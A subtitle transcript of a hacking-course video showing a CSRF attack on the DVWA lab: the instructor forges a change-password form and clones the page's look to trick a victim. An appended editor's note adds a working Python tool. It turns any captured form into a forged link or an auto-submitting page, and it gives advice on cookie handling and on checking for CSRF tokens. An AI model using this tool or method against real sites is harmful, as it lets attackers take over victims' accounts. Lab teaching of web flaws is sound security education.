1
00:00:00,600 --> 00:00:01,650
Instructor: Welcome back.

2
00:00:01,650 --> 00:00:06,650
In this video I want to talk about a vulnerability called CSRF,

3
00:00:07,020 --> 00:00:11,490
also known as cross-site request forgery.

4
00:00:11,490 --> 00:00:13,920
Now this is something that you might remember

5
00:00:13,920 --> 00:00:16,170
from the scanning section of the course

6
00:00:16,170 --> 00:00:19,320
where we used Nmap to discover vulnerabilities.

7
00:00:19,320 --> 00:00:22,320
And on one of our targets we got a response

8
00:00:22,320 --> 00:00:26,760
that a possible CSRF vulnerability was there.

9
00:00:26,760 --> 00:00:28,710
Well, the time has come

10
00:00:28,710 --> 00:00:32,729
to finally see what this vulnerability is.

11
00:00:32,729 --> 00:00:35,460
Many people think that this is something similar

12
00:00:35,460 --> 00:00:38,910
or the same as XSS or cross-site scripting,

13
00:00:38,910 --> 00:00:40,890
but that is not the case.

14
00:00:40,890 --> 00:00:42,990
In cross-site request forgery,

15
00:00:42,990 --> 00:00:45,540
the attacker makes the identified user

16
00:00:45,540 --> 00:00:49,590
execute something that they didn't want to execute.

17
00:00:49,590 --> 00:00:53,400
A CSRF attack can be used to exploit any web function

18
00:00:53,400 --> 00:00:55,440
that searches for one request

19
00:00:55,440 --> 00:00:57,420
inside of the identified session

20
00:00:57,420 --> 00:01:01,323
in case the security applied isn't efficient enough.

21
00:01:02,280 --> 00:01:03,750
Some of the things that you can do

22
00:01:03,750 --> 00:01:05,940
with cross-site request forgery

23
00:01:05,940 --> 00:01:08,100
would be something like changing details

24
00:01:08,100 --> 00:01:11,280
about a specific user, like email addresses,

25
00:01:11,280 --> 00:01:14,400
the date when they were born, and so on and so on.
26
00:01:14,400 --> 00:01:17,430
You can also perform fake banking transactions,

27
00:01:17,430 --> 00:01:20,370
add items to buy on a certain page,

28
00:01:20,370 --> 00:01:24,060
but this is not something that we can accomplish easily.

29
00:01:24,060 --> 00:01:26,220
For this attack, we need a victim

30
00:01:26,220 --> 00:01:30,150
that has an active identified session inside of the website,

31
00:01:30,150 --> 00:01:33,510
and they will also have to visit our URL link

32
00:01:33,510 --> 00:01:36,600
that we craft in order for this to work.

33
00:01:36,600 --> 00:01:39,330
Now let's take a look at a simple example

34
00:01:39,330 --> 00:01:43,110
of how to do this on our DVWA page.

35
00:01:43,110 --> 00:01:47,610
So start your Metasploitable, visit the page as usual.

36
00:01:47,610 --> 00:01:52,080
We want to go to the DVWA, and we can log in right here.

37
00:01:52,080 --> 00:01:54,540
But remember that we did the SQL injection.

38
00:01:54,540 --> 00:01:57,300
We no longer have to log in as the admin user.

39
00:01:57,300 --> 00:01:59,460
We can log in as any other user

40
00:01:59,460 --> 00:02:02,820
from the data that we extracted with our SQL injection.

41
00:02:02,820 --> 00:02:05,940
So if you remember, we had the user called Gordon

42
00:02:05,940 --> 00:02:08,100
who had the username of gordonb

43
00:02:08,100 --> 00:02:10,860
and his password was ABC123.

44
00:02:10,860 --> 00:02:13,770
If you remember, we got his MD5 hash,

45
00:02:13,770 --> 00:02:15,570
then we pasted it into Google

46
00:02:15,570 --> 00:02:18,240
and we got that his hash was equivalent

47
00:02:18,240 --> 00:02:20,013
to a string of ABC123.

48
00:02:21,240 --> 00:02:23,400
So we can log in as Gordon.

49
00:02:23,400 --> 00:02:26,553
And we can see down here: you have logged in as gordonb.

50
00:02:27,930 --> 00:02:29,853
Now let's set the security to low,

51
00:02:32,040 --> 00:02:35,643
and let's navigate to CSRF right here.
52
00:02:36,510 --> 00:02:38,640
So we can see the vulnerability:

53
00:02:38,640 --> 00:02:42,630
cross-site request forgery, and the application requires us

54
00:02:42,630 --> 00:02:45,450
to change our admin password.

55
00:02:45,450 --> 00:02:50,010
So we got the new password and confirm new password.

56
00:02:50,010 --> 00:02:54,230
What we can do is we can, for example, type password123

57
00:02:55,770 --> 00:02:58,963
and confirm the password to be password123.

58
00:03:00,990 --> 00:03:04,710
If I click on Change, it says password changed,

59
00:03:04,710 --> 00:03:07,560
and let's see whether it indeed got changed.

60
00:03:07,560 --> 00:03:10,680
So if I log in as admin and then password,

61
00:03:10,680 --> 00:03:12,780
remember that before it was just password,

62
00:03:12,780 --> 00:03:15,000
now it is password123.

63
00:03:15,000 --> 00:03:17,550
If I log in, well, now it'll work.

64
00:03:17,550 --> 00:03:20,070
We successfully changed the password.

65
00:03:20,070 --> 00:03:23,103
But how can we use this to exploit it?

66
00:03:24,060 --> 00:03:28,380
Well, if I right click and go on view page source,

67
00:03:28,380 --> 00:03:30,840
there will be a vulnerable part of code

68
00:03:30,840 --> 00:03:32,430
inside of this page.

69
00:03:32,430 --> 00:03:35,010
And that part of code will be the form

70
00:03:35,010 --> 00:03:38,340
where we submit the new password.

71
00:03:38,340 --> 00:03:39,900
If we scroll all the way down,

72
00:03:39,900 --> 00:03:41,940
here is the part of the code that is vulnerable.

73
00:03:41,940 --> 00:03:45,300
We got the form where we can submit the new password,

74
00:03:45,300 --> 00:03:48,420
where we can also reconfirm the new password.

75
00:03:48,420 --> 00:03:49,350
And you will notice

76
00:03:49,350 --> 00:03:53,310
that this is under the vulnerable code area.
77
00:03:53,310 --> 00:03:56,760
So what we can do with CSRF is we can copy

78
00:03:56,760 --> 00:03:58,380
this vulnerable form

79
00:03:58,380 --> 00:04:01,140
where we submit the username and password,

80
00:04:01,140 --> 00:04:04,110
and we are going to create our small HTML page

81
00:04:04,110 --> 00:04:06,690
that we are going to host on our Apache2 web server.

82
00:04:06,690 --> 00:04:10,050
And you're going to see in just a second why we do that.

83
00:04:10,050 --> 00:04:11,820
So we'll open a terminal

84
00:04:11,820 --> 00:04:16,290
and I will navigate to the directory of our web server.

85
00:04:16,290 --> 00:04:17,190
And if you remember,

86
00:04:17,190 --> 00:04:21,570
that is /var/www/html.

87
00:04:21,570 --> 00:04:25,260
Now since we can't write files right here as a regular user,

88
00:04:25,260 --> 00:04:27,243
let us enter the root account.

89
00:04:28,350 --> 00:04:32,430
If I type ls, we got our tester.py; we can remove it.

90
00:04:32,430 --> 00:04:33,720
We no longer need it here.

91
00:04:33,720 --> 00:04:37,200
And once you got this directory clear and empty,

92
00:04:37,200 --> 00:04:41,850
let us nano the csrf.html file.

93
00:04:41,850 --> 00:04:43,290
Let's call it like that.

94
00:04:43,290 --> 00:04:45,480
Now feel free to call it anything that you want.

95
00:04:45,480 --> 00:04:48,420
Just make sure that you have this .html extension

96
00:04:48,420 --> 00:04:49,743
on this file.

97
00:04:50,640 --> 00:04:53,490
Now that we opened it, we can paste the code

98
00:04:53,490 --> 00:04:55,020
that we copied from the page,

99
00:04:55,020 --> 00:04:56,760
and you will notice it is the form

100
00:04:56,760 --> 00:04:58,920
where we change our password.

101
00:04:58,920 --> 00:05:00,510
Now there are a few things

102
00:05:00,510 --> 00:05:03,510
that we want to change right here.
103
00:05:03,510 --> 00:05:07,650
For example, this action we want to change to the page link

104
00:05:07,650 --> 00:05:10,320
where we change our password on our DVWA.

105
00:05:10,320 --> 00:05:13,593
And that page link is this link right here.

106
00:05:14,430 --> 00:05:17,520
Let's copy it, let's paste it right here.

107
00:05:17,520 --> 00:05:20,730
And what this action simply refers to is, once we change

108
00:05:20,730 --> 00:05:22,710
the password, it'll redirect us

109
00:05:22,710 --> 00:05:26,550
to whatever page is inside of this action field.

110
00:05:26,550 --> 00:05:31,260
So it'll just redirect us back to this page right here.

111
00:05:31,260 --> 00:05:34,110
Let's copy this and paste it.

112
00:05:34,110 --> 00:05:36,150
Now that we got the page right here,

113
00:05:36,150 --> 00:05:37,860
there are two more things that we need to add

114
00:05:37,860 --> 00:05:39,660
in order for this attack to work,

115
00:05:39,660 --> 00:05:42,660
and that is inside of these input fields.

116
00:05:42,660 --> 00:05:46,110
So we got the name of the field, which is password_new.

117
00:05:46,110 --> 00:05:48,480
I believe it is this field right here.

118
00:05:48,480 --> 00:05:51,090
And the second field is confirm new password,

119
00:05:51,090 --> 00:05:54,423
which is this field right here, password_confirm.

120
00:05:55,290 --> 00:05:58,980
We want to automatically add a value to those fields.

121
00:05:58,980 --> 00:06:02,340
And in this case that value will be a new password.

122
00:06:02,340 --> 00:06:04,890
So what we can do is we can type a space

123
00:06:04,890 --> 00:06:06,870
right after the password name

124
00:06:06,870 --> 00:06:08,860
and we can type value="",

125
00:06:10,620 --> 00:06:12,480
and in between the double quotes

126
00:06:12,480 --> 00:06:14,310
we can type the new password.

127
00:06:14,310 --> 00:06:17,250
Let's say the new password is hacked.

128
00:06:17,250 --> 00:06:19,590
We must do that for the second field as well.
129
00:06:19,590 --> 00:06:24,590
So value="" and then hacked.

130
00:06:24,690 --> 00:06:26,850
Now you will notice once we visit this page

131
00:06:26,850 --> 00:06:30,390
that in that case the fields will already be completed;

132
00:06:30,390 --> 00:06:32,220
they will have this hacked value

133
00:06:32,220 --> 00:06:35,010
inside of both of these fields.

134
00:06:35,010 --> 00:06:35,940
Let's give it a try.

135
00:06:35,940 --> 00:06:38,110
If I save this with Control + O

136
00:06:40,320 --> 00:06:42,720
and I start my Apache2 web server

137
00:06:42,720 --> 00:06:45,993
by typing service apache2 start,

138
00:06:47,820 --> 00:06:51,190
all we need to do right now is visit our localhost

139
00:06:52,860 --> 00:06:57,330
and the csrf.html file, which is the only file

140
00:06:57,330 --> 00:07:00,690
inside of our Apache2 web server directory.

141
00:07:00,690 --> 00:07:03,360
So we got this right here.

142
00:07:03,360 --> 00:07:04,530
And this is the link

143
00:07:04,530 --> 00:07:07,320
that we would want to send to our victim.

144
00:07:07,320 --> 00:07:08,970
Now I know it doesn't look nearly

145
00:07:08,970 --> 00:07:10,710
as good as this page right here,

146
00:07:10,710 --> 00:07:13,650
but let's just give it a try to see if it works.

147
00:07:13,650 --> 00:07:16,320
If we did everything correctly,

148
00:07:16,320 --> 00:07:18,390
once we click on this Change button

149
00:07:18,390 --> 00:07:21,780
on our localhost CSRF file,

150
00:07:21,780 --> 00:07:24,510
we will successfully change the password

151
00:07:24,510 --> 00:07:28,080
of the admin account on this DVWA page.

152
00:07:28,080 --> 00:07:29,730
So we send this to the target,

153
00:07:29,730 --> 00:07:30,970
the target clicks on Change,

154
00:07:32,760 --> 00:07:34,890
and we get redirected

155
00:07:34,890 --> 00:07:38,880
to our Metasploitable DVWA CSRF page,

156
00:07:38,880 --> 00:07:41,910
and it says password changed.
157
00:07:41,910 --> 00:07:44,070
Let's see whether it indeed got changed.

158
00:07:44,070 --> 00:07:46,200
Remember we typed the value of hacked,

159
00:07:46,200 --> 00:07:47,400
and now if I go right here

160
00:07:47,400 --> 00:07:49,923
and type admin and hacked,

161
00:07:51,030 --> 00:07:55,140
well, it worked, we logged in with the new password

162
00:07:55,140 --> 00:07:58,560
that someone typed in while visiting our page

163
00:07:58,560 --> 00:08:00,540
on our localhost.

164
00:08:00,540 --> 00:08:02,703
But if you noticed, on this page

165
00:08:05,700 --> 00:08:07,080
we only copied the form.

166
00:08:07,080 --> 00:08:09,330
And if we were to host just the form code

167
00:08:09,330 --> 00:08:12,600
on our Apache2 server like we are doing right now,

168
00:08:12,600 --> 00:08:13,770
it would look suspicious,

169
00:08:13,770 --> 00:08:18,570
because if we take a look at this page and this page,

170
00:08:18,570 --> 00:08:21,180
they don't look nearly the same.

171
00:08:21,180 --> 00:08:23,760
So how could we make it look the same?

172
00:08:23,760 --> 00:08:27,450
Well, the first thing that we must do is we must go right here,

173
00:08:27,450 --> 00:08:29,580
right click, view page source,

174
00:08:29,580 --> 00:08:33,450
and we must copy the entire HTML code and not just the form.

175
00:08:33,450 --> 00:08:35,909
So what you can do is you can select the page,

176
00:08:35,909 --> 00:08:39,270
type Control + A, it will select all the code

177
00:08:39,270 --> 00:08:42,840
inside of this file, and we can copy it.

178
00:08:42,840 --> 00:08:45,930
Then we can go to our Apache web directory

179
00:08:45,930 --> 00:08:50,643
and we can remove the CSRF file and we can nano a new one.

180
00:08:52,230 --> 00:08:54,280
Here we will paste the entire code,

181
00:08:56,280 --> 00:08:58,740
and remember that we must do the same thing

182
00:08:58,740 --> 00:09:00,360
that we did inside of our form.
183
00:09:00,360 --> 00:09:03,960
So find the form code, and here we want to put the link

184
00:09:03,960 --> 00:09:06,873
to our page, which is this link once again.

185
00:09:07,710 --> 00:09:09,663
Copy it, paste it right here.

186
00:09:11,280 --> 00:09:14,313
We also want to add the value to our password fields.

187
00:09:15,330 --> 00:09:18,870
We can change the password right now back to password,

188
00:09:18,870 --> 00:09:22,740
just so we put it back as it was.

189
00:09:22,740 --> 00:09:26,880
And now that we did this, we can save this.

190
00:09:26,880 --> 00:09:29,550
And if I go and visit the page once again,

191
00:09:29,550 --> 00:09:32,190
or I just reload this page,

192
00:09:32,190 --> 00:09:33,720
well, it looks a little bit better

193
00:09:33,720 --> 00:09:36,150
but it is still not the same page;

194
00:09:36,150 --> 00:09:40,110
we're missing some decoration that this page has.

195
00:09:40,110 --> 00:09:43,320
And if you have some experience in web development,

196
00:09:43,320 --> 00:09:47,130
you will know that we are missing the CSS file.

197
00:09:47,130 --> 00:09:51,000
So what we can do to add the CSS file is we can go

198
00:09:51,000 --> 00:09:55,620
to the page source of our page that we got open

199
00:09:55,620 --> 00:09:57,870
and we can navigate to the CSS file.

200
00:09:57,870 --> 00:10:02,343
So just search for any file type that ends with .css.

201
00:10:03,300 --> 00:10:06,240
And if I go up here, here is one of them,

202
00:10:06,240 --> 00:10:08,400
and it is called main.css.

203
00:10:08,400 --> 00:10:09,780
And by looking at this page,

204
00:10:09,780 --> 00:10:13,320
it seems that this is the only CSS file that this page has.

205
00:10:13,320 --> 00:10:14,670
So let's click on that.

206
00:10:14,670 --> 00:10:17,730
And here is the CSS code that we also must save

207
00:10:17,730 --> 00:10:20,490
in the same directory as our HTML file.
208
00:10:20,490 --> 00:10:23,253
So let's select everything, copy this,

209
00:10:24,360 --> 00:10:28,200
and let's go back to our web directory.

210
00:10:28,200 --> 00:10:31,200
Right here we are going to nano main.css

211
00:10:31,200 --> 00:10:34,350
and let's just paste all of this code.

212
00:10:34,350 --> 00:10:37,690
Now that we have the CSS code right here, we can save this,

213
00:10:38,580 --> 00:10:40,200
but it'll still not work

214
00:10:40,200 --> 00:10:44,790
if we don't change the file location inside of our code.

215
00:10:44,790 --> 00:10:46,790
Because if you take a look right here

216
00:10:47,820 --> 00:10:49,710
where we add the CSS file,

217
00:10:49,710 --> 00:10:53,370
it is still the location on our Metasploitable machine.

218
00:10:53,370 --> 00:10:56,520
And since we have it in the same directory as our HTML file

219
00:10:56,520 --> 00:10:58,230
on our Apache2 web server,

220
00:10:58,230 --> 00:11:02,190
what we can do is we can just remove the entire path

221
00:11:02,190 --> 00:11:04,380
and leave just the name of the file,

222
00:11:04,380 --> 00:11:07,080
because they're both located in the same directory.

223
00:11:07,080 --> 00:11:11,073
So we can just leave it like this, then we can save this.

224
00:11:12,510 --> 00:11:17,010
And now if we refresh our localhost page,

225
00:11:17,010 --> 00:11:21,990
well, now it looks the same, just this page isn't zoomed in.

226
00:11:21,990 --> 00:11:24,150
So what we can do is we can zoom this in,

227
00:11:24,150 --> 00:11:27,150
and they look exactly the same.

228
00:11:27,150 --> 00:11:30,420
So the password is, remember, right now just password.

229
00:11:30,420 --> 00:11:31,983
And if we click on Change,

230
00:11:32,850 --> 00:11:34,740
it'll redirect us to the real page

231
00:11:34,740 --> 00:11:37,530
and it'll say the password has changed.

232
00:11:37,530 --> 00:11:38,970
Let's give it a try once again

233
00:11:38,970 --> 00:11:40,920
and see whether it indeed got changed.
234
00:11:40,920 --> 00:11:44,940
So I will just go to my DVWA page, log out,

235
00:11:44,940 --> 00:11:47,793
and type admin and then password.

236
00:11:50,700 --> 00:11:52,890
And we did it again,

237
00:11:52,890 --> 00:11:57,163
just this time we made our page look exactly the same,

238
00:12:01,290 --> 00:12:03,120
as we can see right here.

239
00:12:03,120 --> 00:12:06,540
Great, this is the CSRF attack,

240
00:12:06,540 --> 00:12:10,080
or cross-site request forgery attack.

241
00:12:10,080 --> 00:12:12,660
As you can see, it requires them to open our link,

242
00:12:12,660 --> 00:12:14,310
otherwise this will not work.

243
00:12:14,310 --> 00:12:16,050
But if you manage to trick them

244
00:12:16,050 --> 00:12:18,510
by making the page look identical,

245
00:12:18,510 --> 00:12:20,640
then this attack will work

246
00:12:20,640 --> 00:12:23,340
and you will successfully change their password.

247
00:12:23,340 --> 00:12:25,620
Now this can be performed on other stuff

248
00:12:25,620 --> 00:12:28,860
and not just the password fields, as we remembered.

249
00:12:28,860 --> 00:12:30,540
You can use this to change emails,

250
00:12:30,540 --> 00:12:33,543
to change dates, and many other things as well.

251
00:12:34,590 --> 00:12:35,850
Now that we covered this,

252
00:12:35,850 --> 00:12:40,080
in the next video we are going to cover the brute force attack,

253
00:12:40,080 --> 00:12:40,950
and we are going to see

254
00:12:40,950 --> 00:12:42,840
how we can perform the brute force attack

255
00:12:42,840 --> 00:12:44,730
in two different ways.

256
00:12:44,730 --> 00:12:45,690
So thank you for watching

257
00:12:45,690 --> 00:12:48,030
and I will see you in the next lecture.

258
00:12:48,030 --> 00:12:48,863
Bye.
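Editor's note (added example, not part of the video transcript, the course, or DVWA): the manual steps in the lecture (copy the vulnerable form, point its action at the real change-password URL, pre-fill both password fields with "hacked") can be scripted. The block below parses a captured form, fills in attacker-chosen values, and emits both the forged GET link the instructor sends to the victim and an auto-submitting page that needs no click on Change. The sample form is constructed to resemble the DVWA low-security form as described in the video, with the field names given in the transcript (password_new, password_confirm, Change); the hostname metasploitable.lab and the /dvwa/vulnerabilities/csrf/ path are assumptions, so check the real page source before using it.

```python
"""Build a CSRF proof-of-concept from a captured HTML form (example code)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlencode, urljoin


class FormFieldParser(HTMLParser):
    """Collect the action, method and named inputs of the first <form> on a page."""

    def __init__(self):
        super().__init__()
        self.action = ""
        self.method = "GET"
        self.fields = []  # (name, value) pairs in document order
        self._in_form = False
        self._done = False

    def handle_starttag(self, tag, attrs):
        if self._done:
            return
        a = dict(attrs)  # HTMLParser lowercases attribute names (AUTOCOMPLETE -> autocomplete)
        if tag == "form" and not self._in_form:
            self._in_form = True
            self.action = a.get("action") or ""
            self.method = (a.get("method") or "GET").upper()
        elif tag == "input" and self._in_form and a.get("name"):
            # A browser does not submit unchecked boxes/radios, so neither do we.
            if (a.get("type") or "text").lower() in ("checkbox", "radio") and "checked" not in a:
                return
            self.fields.append((a["name"], a.get("value") or ""))

    def handle_endtag(self, tag):
        if tag == "form" and self._in_form:
            self._in_form, self._done = False, True


def parse_form(page_html, page_url):
    """Return the first form's absolute action URL, method and fields.

    DVWA's form uses action="#", which urljoin resolves back to the page itself,
    exactly the substitution the video performs by hand.
    """
    p = FormFieldParser()
    p.feed(page_html)
    p.close()
    return {"action": urljoin(page_url, p.action), "method": p.method, "fields": p.fields}


def with_values(fields, overrides):
    """Return a copy of the fields with the attacker-chosen values filled in."""
    return [(n, overrides.get(n, v)) for n, v in fields]


def has_csrf_token(fields, token_names=("user_token", "csrf_token", "_token", "authenticity_token")):
    """Heuristic: a per-session token field means a static replay like this one fails."""
    return any(n in token_names for n, _ in fields)


def build_csrf_url(action, fields):
    """For a GET form the whole forged request fits in one link."""
    return action + "?" + urlencode(fields)


def _attr(value):
    return escape(value, quote=True)


def build_csrf_poc(action, fields, method="GET"):
    """Auto-submitting page: the victim only has to load it, no click on Change."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{_attr(n)}" value="{_attr(v)}">' for n, v in fields
    )
    return (
        "<!DOCTYPE html>\n<html><body>\n"
        f'  <form id="csrf" action="{_attr(action)}" method="{_attr(method)}">\n'
        f"{inputs}\n  </form>\n"
        '  <script>document.getElementById("csrf").submit();</script>\n'
        "</body></html>\n"
    )


# Constructed sample: modeled on the DVWA (security: low) change-password form as
# described in the video. Hostname and path are assumptions, not taken from the course.
PAGE_URL = "http://metasploitable.lab/dvwa/vulnerabilities/csrf/"
CAPTURED_FORM = """
<form action="#" method="GET">
  New password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
  Confirm new password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_confirm"><br />
  <input type="submit" value="Change" name="Change">
</form>
"""


def forge(page_html=CAPTURED_FORM, page_url=PAGE_URL, new_password="hacked"):
    """Full pipeline: parse the captured form, fill it in, emit link and PoC page."""
    form = parse_form(page_html, page_url)
    fields = with_values(form["fields"], {"password_new": new_password, "password_confirm": new_password})
    return {
        "tokenized": has_csrf_token(fields),
        "url": build_csrf_url(form["action"], fields),
        "html": build_csrf_poc(form["action"], fields, form["method"]),
    }


if __name__ == "__main__":
    result = forge()
    print(result["url"])
    print(result["html"])
```

Two practitioner caveats. First, the prerequisite the lecture states still holds: the victim's browser must carry a logged-in DVWA session cookie when it loads the page, and because this form submits with GET, a top-level navigation to it sends that cookie even under today's default SameSite=Lax cookie handling; a POST-only endpoint would typically not be reachable this way from a cross-site page. Second, `has_csrf_token` is the check to run before bothering with the page styling: if the captured form carries a per-session token field, a static copy of the form will be rejected no matter how identical it looks.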